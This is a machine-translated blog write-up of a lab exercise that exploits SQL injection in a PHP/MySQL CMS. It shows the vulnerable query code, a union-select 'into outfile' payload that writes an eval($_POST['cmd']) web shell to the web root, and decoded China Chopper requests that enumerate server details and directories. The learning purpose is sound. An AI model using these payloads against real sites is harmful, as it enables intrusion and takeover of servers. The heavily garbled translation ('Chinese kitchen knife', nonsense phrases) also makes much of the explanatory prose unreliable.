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Lessons and thoughts of the first SQL injection

2022-07-07 04:35:00 Resurgent Deutsch ball

sql Injection experiments

The shooting range is in the cloud performance class web Safe entry sql Injection section I
I don't know what this course is sql Inject , What is a file upload vulnerability

You really need to speed up first SQL Basics ,MYSQL,PHP,HTML, Just have a look

I think you understand SQL Injected pre knowledge

1.HTML and PHP Form interaction , The code is not hard to knock , It can be used wireshark Grab the bag and observe the whole process

2.PHP Some super global variables of , such as $_GET[],_POST[] wait

3. What do Chinese kitchen knives do ,LAMP The structure of the website

4.PHP call MYSQL

Here is the body

sql How injection happens


This problem, or why can it be carried out SQL Inject ?SQL Injection principle ?

Through the SQL Command insert into web Form submission , Enter the domain name , The query string of the page request , Cheat the server to execute SQL command

Pass in... By constructing special input as a parameter web Applications

If web If the application does not carefully filter the user's input, it may cause SQL Successful attack

These three sentences now look very mysterious

however As long as Steiner attacks , Things will get better

I didn't learn PHP and MYSQL When , My question is , Why enter in the domain name line SQL Statement can make the database react ?

Now we can have a general assumption

After the question mark at the end of the domain name line id=33 Should be GET A request for the form , The key is id, The value is 33


My guess is ,id=33 Corresponds to the... In the data table 33 Record No ,php The code should include $_GET["id"] This value Directly used in SQL In the sentence

Or it is originally a gain id=33 The record of has executed other SQL sentence

Start with the server code

In order to find out this matter , I followed the experimental manual in a muddle headed way first , Then I got the management authority of the website with Chinese kitchen knife ? You can see the tree structure of the website , All resources of the website


Because we found that we can sql The injected web page is show.php, So we go from show.php Start studying


include_once 'header.php';
$arc = getArticleInfo();
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php echo $arc['title'];?></title>

<table width="990" align="center">
    <th height="40" style="color:#FFF""><?php echo $arc['title'];?>&nbsp;</th> </tr> <tr> <td align="left" class="white"><?php echo $arc['content'];?>&nbsp;</td>
include_once 'footer.php';

It is found that there is no statement calling the database , Presumably in $arc = getArticleInfo(); In this sentence

ctrl+ Left click this function to jump to common.fuction.php In this file

common.fuction.php part

/** *  Get article details  * @param $id */
function getArticleInfo($id = 0)
    global $db;
    if ($id == 0) {
        if (empty($_GET['id'])) {
            return false;
        } else {
            $id = $_GET['id'];
    return $db->getOneRow("select * from cms_article where id=" . $id);

This document is full of get function , The common feature of these functions is that there is a sentence global $db;

It is presumed that somewhere a Global position Database handle for , Then it can be referenced in each function

show.php Introduced at the beginning header.php

and header.php Introduced at the beginning include/config.inc.php and include/common.function.php

$db Your statement is in include/config.inc.php in



header('Content-Type: text/html; charset=utf-8');

define('ROOT_PATH', dirname(dirname(__FILE__)) . '/');    // The root directory of the website ( Absolute path )

require_once ROOT_PATH . 'include/database.inc.php';        // Database configuration file 
require_once ROOT_PATH . 'include/db_mysql.php';        // Database operation class 

/*------------------------------------------------ *  Database connection  *-----------------------------------------------*/
$db = new db_mysql();//db Declared location of ,

/* prevent  PHP 5.1.x  Use the time function to report an error */
if (function_exists('date_default_timezone_set')) date_default_timezone_set('PRC');

go back to common.fuction.php

Every get Functions are used for database operations

As the notes say ,getArticleInfo This function is used to get the details of the article

From 8 Go to the first place 14 OK, that's right GET Form processing , The first function is to judge the input id Is it meaningful ( Not zero ), The second is to declare a $id local variable , Convenient to call later

The most critical statement is the 15 Yes return sentence , This is an object-oriented statement getOneRow Obviously not a library function , Should be db Member functions of the class to which the object belongs

row It means ok , It can be inferred from the function name that a line is returned sql Statement results

ctrl+ Left click getOneRow The function comes to db_mysql.php file

Indeed, only one class is defined in this file class db_mysql

getOneRow Is one of its many member functions

db_mysql.php part

    function getOneRow($sql) {
        $res = $this->query ( $sql );
        if ($res !== false) {
            return mysql_fetch_assoc ( $res );
        } else {
            return false;

The function parameters $sql At first glance, we know that it is going to be implemented sql Statement , Just now from getArticleInfo() It was... That was introduced SQL sentence

The first 2 Line with $res Carrying SQL The return value of the statement ,query() It should be another member function of this class

    function query($sql) {
        if ($this->debug) echo "<pre><hr>\n" . $sql . "\n<hr></pre>";// If set to debug mode , Will print SQL sentence 
        if (! ($query = mysql_query ( $sql, $this->link_id ))) {
            $this->ErrorMsg ();
            return false;
        } else {
            return $query;

among $this->link_id by class db_mysql Member variables of , Its initial value is null , Get valid values in the member function connect() in :

 /** *  Connect to database  * * param string $dbhost  Database host name <br /> * param string $dbuser  Database user name <br /> * param string $dbpw  Database password <br /> * param string $dbname  Database name <br /> * param string $dbcharset  Database character set <br /> * param string $pconnect  Persistent links ,1 For opening ,0 To close  * return bool **/
    function connect($dbhost, $dbuser, $dbpwd, $dbname = '', $dbcharset = 'utf8', $pconnect = 0) {
        if ($pconnect) {
            if (! $this->link_id = mysql_pconnect ( $dbhost, $dbuser, $dbpwd )) {
                // The old version of the database connection function , Now it's abandoned 
                $this->ErrorMsg ();
        } else {
            if (! $this->link_id = mysql_connect ( $dbhost, $dbuser, $dbpwd, 1 )) {
                $this->ErrorMsg ();
        $this->version = mysql_get_server_info ( $this->link_id );
        if ($this->getVersion () > '4.1') {
            if ($dbcharset) {
                mysql_query ( "SET character_set_connection=" . $dbcharset . ", character_set_results=" . $dbcharset . ", character_set_client=binary", 
                             $this->link_id );

            if ($this->getVersion () > '5.0.1') {
                mysql_query ( "SET sql_mode=''", $this->link_id );
        if (mysql_select_db ( $dbname, $this->link_id ) === false) {
            $this->ErrorMsg ();

This query() A function actually calls a library function mysql_query() Actually implemented sql sentence , Other functions only make some painless judgments

Now the ball is kicked mysql_query Function

The explanation of this function :

#[Deprecated('5.5')] // from php5.5 This function has been obsolete since version  function mysql_query($query, $link_identifier = null) bool|resource Send a MySQL query// The function is to send a MYSQL Inquire about  Deprecated// obsolete  Parameters:// Parameters  string// String type  $query// Inquire about  An SQL query// One SQL Query statement  The query string should not end with a semicolon. Data inside the query should be properly escaped. // The query string should not end with a semicolon . The data should be correct   escape  resource// A resource is a special variable type , Saved a reference to an external resource : If you open a file 、  Count   According to the   library   Connect 、 Graphic canvas area, etc . $link_identifier// Connection marks  [optional]
For SELECT, SHOW, DESCRIBE, EXPLAIN and other statements returning resultset, mysql_query returns a resource on success, or false on error.
    // If SELECT, SHOW, DESCRIBE, EXPLAIN If the statement query is correct, the resource will be returned ( Handle ) Otherwise return to false
For other type of SQL statements, INSERT, UPDATE, DELETE, DROP, etc, mysql_query returns true on success or false on error.
    // Other types, such as INSERT, UPDATE, DELETE, DROP wait , The query returns correctly true, error false
The returned result resource should be passed to mysql_fetch_array, and other functions for dealing with result tables, to access the returned data.// The return value should be passed to mysql_fetch_array Or other processing functions 
Use mysql_num_rows to find out how many rows were returned for a SELECT statement or mysql_affected_rows to find out how many rows were affected by a DELETE, INSERT, REPLACE, or UPDATE statement.
    //mysql_num_rows View the number of rows in the query result ( That is, the number of records that meet the conditions )
mysql_query And will return to false will also fail and return false if the user does not have permission to access the table(s) referenced by the query.
    // If the user does not have access to the data table ,mysql_query And will return to false
D:/PhpStorm 2021.3.1/plugins/php/lib/php.jar!/stubs/mysql/mysql.php


Read here , We can generally know this sql How injection occurs or why it can be injected , Or where are the loopholes :


It's legal ( Meet the expectations of website developers ) Domain name of , among id=33 by GET Form content , Request to query the database 33 Data

however , The domain name question mark is actually executable whatever SQL Of the statement

We have observed all the related functions along the way , None of them are right SQL There are restrictions on the form of statements


This series of function calls is actually a sql Sentence has been playing the ball , Kick to library function mysql_query() To perform

The fault is not in the library function , This library function only performs the most basic execution SQL sentence , There is no right or obligation to manage SQL What is the legitimacy of a statement

Wrong The first three functions have no restrictions SQL Statement content ,

Even if it is getArticleInfo In function

		if (empty($_GET['id'])) {
            return false;

I only care about id Whether the value of is empty , It doesn't matter. id Value Is it harmful

Only then did I understand , What does Yunyan mean in class


In the subject , The designer's ideal SQL The statement is id= Number to request the number of records

The attacker uses select Wait for the statement to get other information

This is like using key combinations that are not introduced in the rules but exist in the boxing emperor


In the subject " Special input " Is refers to "id=33" Input other than

" Careful filtration " The designer should limit that we can only use "id=1,id=10" And so on , Should not use "select" This kind of sentence

<?php eval($_POST['mycommand']); ?>

The meaning of this sentence :

This is a piece. php sentence , It implements a eval function


function eval($code) mixed
Evaluates the given code as PHP.
// Set the given parameters $code As php Code ( To carry out )
Caution: The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. 
// look out :eval() Language constructors allow arbitrary PHP Code , Therefore, it is dangerous 
 Its use thus is discouraged. 
 // Therefore, the use of this function is discouraged 
 If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
 // Even if you have to use this function as a last resort , You also need to check the data provided by the user before passing the data provided by the user as the function parameter 

Valid PHP code to be evaluated.// The validity to be evaluated php Code 
The code must not be wrapped in opening and closing PHP tags, i.e. 'echo "Hi!";' must be passed instead of '<?php echo "Hi!"; ?>'. It is still possible to leave and re-enter PHP mode though using the appropriate PHP tags, e.g. 'echo "In PHP mode!"; ?>In HTML mode!<?php echo "Back in PHP mode!";'.
Apart from that the passed code must be valid PHP. This includes that all statements must be properly terminated using a semicolon. 'echo "Hi!"' for example will cause a parse error, whereas 'echo "Hi!";' will work.
A return statement will immediately terminate the evaluation of the code.
 // The return value will immediately terminate the evaluation 
The code will be executed in the scope of the code calling eval().

Thus any variables defined or changed in the eval() call will remain visible after it terminates.
NULL unless return is called in the evaluated code, in which case the value passed to return is returned. As of PHP 7, if there is a parse error in the evaluated code, eval() throws a ParseError exception. Before PHP 7, in this case eval() returned FALSE and execution of the following code continued normally. It is not possible to catch a parse error in eval() using set_error_handler().
D:/PhpStorm 2021.3.1/plugins/php/lib/php.jar!/stubs/standard/_types.php

Talk is talk eval Set its parameters ( character string ) As php Statement to execute


$_POST[] Is one of the super global variable arrays , The function is to carry HTML Emitted POST The content of the form ,mycommand It's a key , The value is determined by the form transfer

wireshark Observe the process

The client is in

The service side in


1.No.5126-No.5128 by TCP Three handshakes to establish a connection

2.No.5129 For the request index.html/testTrojan.php page

hackbar Specified in Post data Parameters


This data is in wireshark Also captured :

It can be clearly observed , The form has only one item , The key is mycommand, The value is echo “helloworld”;


No.5130 For the server to server request response received

No.5139 The server sends the request content to the client


No.5140 The client replies to the server that it has received

No.5249,No.5250 and No.5271,No.5272 Two groups TCP Keep connected because you didn't close the web page in time , Lead to TCP The connection cannot be disconnected

No.5281 To No.5284 After closing the web page ,TCP Connect four times and wave to disconnect

Why is it called In a word " Trojan horse "?

My understanding is that :

Trojan horse is a wooden horse that seems harmless to humans and animals. In fact, there is a mystery inside

After it deceived the gate guards into the city, the soldiers in the Trojan rushed out and occupied the city

In a word, the Trojan horse is similar to its spirit

Pass the command as a string instead of executing it immediately , Then execute... On the server .

Strings are like Trojans , The commands in the string are like soldiers in the Trojan horse

sql Inject the process of obtaining permissions

1. First of all, we need to transport this horse into the city , Is to generate a Trojan file on the server , Prepare for using a kitchen knife

and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,"<?php eval($_POST['cmd']);?>",12,13,14,15 into outfile "/var/www/html/shell.php"

This command will be displayed on the server www/html Next build one shell.php file :

The content is like this :

1	2	cms	4	5	6	7	8	9	10	<?php eval($_POST['cmd']);?>	12	13	14	15

Only <?php ... ?> This part , In other words, executing this file is equivalent to executing eval($_POST['cmd']);

shell.php After the file is generated , Use a Chinese kitchen knife


Notice that in the small box in the upper right corner is a sentence, the password in the Trojan horse , It's used here cmd, Just make sure that the password in the Trojan horse is the same as that in the upper right corner

After adding, the permission of the website is in hand

What did the Chinese kitchen knife do ?

wireshark Grab the bag

We have done two things in Chinese kitchen knives , One is to specify the location of the Trojan horse , Second, specify the password of the Trojan horse

The rest is left to the Chinese kitchen knife , What did it do ? We use wireshark Grab bag observation

No data frame was captured after entering the address and password of the Trojan horse and clicking Edit

When you click " file management ", When accessing the server directory , Finally capture the data frame , Now close the kitchen knife , Study the process of accessing the directory


No.34 To No.36 Three handshakes to establish a connection between the client and the server

No.37 Of POST

No.37 Send for the client to the server POST Forms , The content is :

QQ Screenshot 20220212084717

wireshark The number of words displayed in one line is limited , In the picture above value It's incomplete , complete value:


In general, it can be inferred that cmd The Trojan command was executed base64 Encrypted things , After decoding :

	@set_magic_quotes_runtime(0);// Do not automatically add a backslash 
echo("[email protected]");// Two [email protected] Between them is the footwork 
    foreach(range("A","Z") as $L)



print $R;;

echo("[email protected]");


Analyze... Item by item

@ini_set("display_errors","0");// Set no error 
@set_time_limit(0);// Set no running time limit 
if(PHP_VERSION<'5.3.0'){// If php The version is old 
    @set_magic_quotes_runtime(0);// Set not to automatically add transfer symbols to symbols in strings 
$D=dirname(__FILE__);//$D Used to save the location of the folder where the current file is located 
if(substr($D,0,1)!="/"){// If the current directory $D The beginning of is not / That is, the current directory is not an absolute directory starting from the root directory 
    foreach(range("A","Z") as $L)
        if(is_dir("{$L}:"))			// such as D: by D Disk directory 

POSIX Generally refers to the portable operating system interface .

linux and windows We need to achieve basic posix standard ,linux hold fork The function is encapsulated as posix_fork( Whatever ),windows hold creatprocess Functions are also encapsulated in posix_fork, It's all stated that unistd.h in . such , When programmers write ordinary applications , Just include unistd.h, call posix_fork function , The program is portable at the source level .– From blogs

// If posix_getegid If it exists, call posix_getpwuid(@posix_geteuid())
// among posix_geteuid() The function of is to return the user name of the current user , On the server side, that is root user 
// just posix_getegid() The parameter of is user name , Then return the information of the user 
// If $u Pass just posix_getpwuid() Acquired ,posix_getpwuid() The returned one includes the user name,passwd And so on 
// that $u['name'] Is to take its user name 

// If $u Empty description posix_getpwuid No execution succeeded , Then call get_current_user(); Function to get the user name of the current user 
$R.=php_uname();// This function returns the current php Information of the system where the script is located 

in general , The POST The function of is to request some information from the server , Include Server root , system information

No.38 The server reply received

No.39 The server returns the request

QQ Screenshot 20220212100938


1\t2\tcms\t4\t5\t6\t7\t8\t9\t10\[email protected]/var/www/html\t\tLinux 422866fd44e5 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64(www-data)[email protected]

by shell.php The format specified in , Only 3 and 11 The position can display data

No.40 The client responded that the server received

No.41 Of POST

The client has a new request


After decoding

@ini_set("display_errors", "0");

if (PHP_VERSION < '5.3.0') {
echo("[email protected]");
$D = '/var/www/html/';
$F = @opendir($D);

if ($F == NULL) {

    echo("ERROR:// Path Not Found Or No Permission!");
} else {
    $M = NULL;
    $L = NULL;
    while ($N = @readdir($F)) {
        $P = $D.'/'.$N;
        $T = @date("Y-m-d H:i:s", @filemtime($P));
        @$E = substr(base_convert(@fileperms($P), 10, 8), -4);
        $R = "\t".$T."\t".@filesize($P)."\t".$E."\n";
        if (@is_dir($P))
            $M.= $N."/".$R;
		else $L.= $N.$R;
    echo $M.$L;
echo("[email protected]");

It's obviously getting $D = ‘/var/www/html/’; Sub directories and files under this directory

Change the root directory location to my computer E Disk position $D=‘E:/’; Running results :

[email protected]$RECYCLE.BIN/ 2022-02-02 10:11:21 0 0777 AgeOfEmpires2HD_chs_setup/ 2022-01-26 12:31:10 4096 0777 aoe/ 2022-02-10 14:05:47 0 0777 Kali/ 2022-02-12 00:12:43 4096 0777 myServer/ 2022-01-30 08:17:18 0 0777 ra3/ 2022-01-26 11:32:17 0 0777 System Volume Information/ 2022-01-20 08:42:48 4096 0777 ubuntu1/ 2022-01-28 11:01:19 4096 0777 yxdown.com_AgeOfEmpires2HD_chs.rar 2021-07-15 13:10:50 965080293 0666 [email protected]

No.42 Respond to the server No.41 Client requests

NO.43 The server returns the request

)QlRXø±Eº}@-DÕqÉýÀ¨+}Pp¨FµÇB¤PM}HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 12 Feb 2022 00:41:37 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Content-Length: 721

1	2	cms	4	5	6	7	8	9	10	[email protected]/	2022-02-12 00:40:27	23	0777
../	2020-11-08 13:56:02	18	0777
admin/	2015-12-09 00:38:39	4096	0777
attachment/	2015-12-09 00:38:39	27	0777
images/	2015-12-09 00:38:39	4096	0777
include/	2020-11-08 13:54:11	186	0777
cms.sql	2018-05-30 07:24:16	14290	0777
footer.php	2015-12-09 00:38:10	343	0777
header.php	2015-12-09 00:38:10	1995	0777
index.php	2015-12-09 00:38:10	4211	0777
list.php	2015-12-09 00:38:10	641	0777
message.php	2015-12-09 00:38:10	5009	0777
notice.php	2015-12-09 00:38:10	481	0777
page.php	2015-12-09 00:38:10	376	0777
search.php	2015-12-09 00:38:10	859	0777
show.php	2015-12-09 00:38:10	666	0777
validate.php	2015-12-09 00:38:10	545	0777
shell.php	2022-02-12 00:40:27	64	0666
[email protected]

The service side html Files and subdirectories under the directory

No.44 The client replies that the server has received

No.341 Closed the Chinese kitchen knife , Connection is broken

The above is a series of requests sent by Chinese kitchen knife to the server instead of us , For us , It displays the received reply from the server


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